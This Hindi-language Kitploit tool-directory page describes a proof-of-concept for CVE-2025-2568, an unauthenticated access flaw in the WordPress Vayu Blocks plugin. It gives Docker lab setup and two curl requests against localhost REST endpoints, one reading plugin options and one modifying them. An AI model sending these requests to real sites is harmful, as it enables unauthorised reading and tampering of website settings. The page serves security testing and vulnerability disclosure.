Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC_CVE-2025-2568 — CVE-2025-2568 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो क्षमता जांच (capability checks) की कमी के माध्यम से WordPress Vayu Blocks प्लगइन विकल्पों तक अनधिकृत पहुंच और संशोधन को प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/shinigami-777/poc_cve-2025-2568
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubshinigami-777/poc_cve-2025-2568

PoC_CVE-2025-2568

CVE-2025-2568 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो क्षमता जांच (capability checks) की कमी के माध्यम से WordPress Vayu Blocks प्लगइन विकल्पों तक अनधिकृत पहुंच और संशोधन को प्रदर्शित करता है।

रिपॉजिटरी देखें
10 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PoC CVE-2025-2568

अवलोकन

WordPress और WooCommerce के लिए Vayu Blocks – Gutenberg Blocks प्लगइन, WordPress के लिए, संस्करण 1.0.4 से 1.2.1 में vayu_blocks_get_toggle_switch_values_callback और vayu_blocks_save_toggle_switch_callback फ़ंक्शन में क्षमता जांच की कमी के कारण अनधिकृत पहुंच और डेटा के संशोधन के प्रति संवेदनशील है। यह बिना प्रमाणीकरण वाले हमलावरों के लिए प्लगइन विकल्पों को पढ़ना और _value में समाप्त होने वाले कुंजी नाम वाले किसी भी विकल्प को अपडेट करना संभव बनाता है।

शोषण के चरण

सेटअप (डॉकर का उपयोग करके)

  1. रिपॉजिटरी को क्लोन करें और चरणों का पालन करें:
    root@kitploit:~
    cd vuln-wordpress
    docker-compose up -d
    
  • wp-content/plugins फ़ोल्डर के अंदर Vayu-Plugin को अनज़िप करें।
    root@kitploit:~
    cd wp-content/plugins/
    unzip vayu-blocks.1.2.0.zip
    
    Vayu-blocks प्लगइन (संस्करण 1.2.0) अब इंस्टॉल हो गया है।
  • शोषण:

    1. विकल्पों को पढ़ने के लिए इसका उपयोग करें:
      root@kitploit:~
      curl http://localhost:8080/wp-json/vayu-blocks/v1/get-toggle-values/
      
    2. विकल्प मानों को संशोधित करने के लिए इस तरह एक POST अनुरोध भेजें।
      root@kitploit:~
      curl -X POST http://localhost:8080/wp-json/vayu-blocks/v1/save-toggle-switch \
       -H "Content-Type: application/json" \
       -d '{"key":"container", "value":"new_value"}'
      

    शोषण वीडियो

    wordpressexploit.webm

    टूल डाउनलोड करें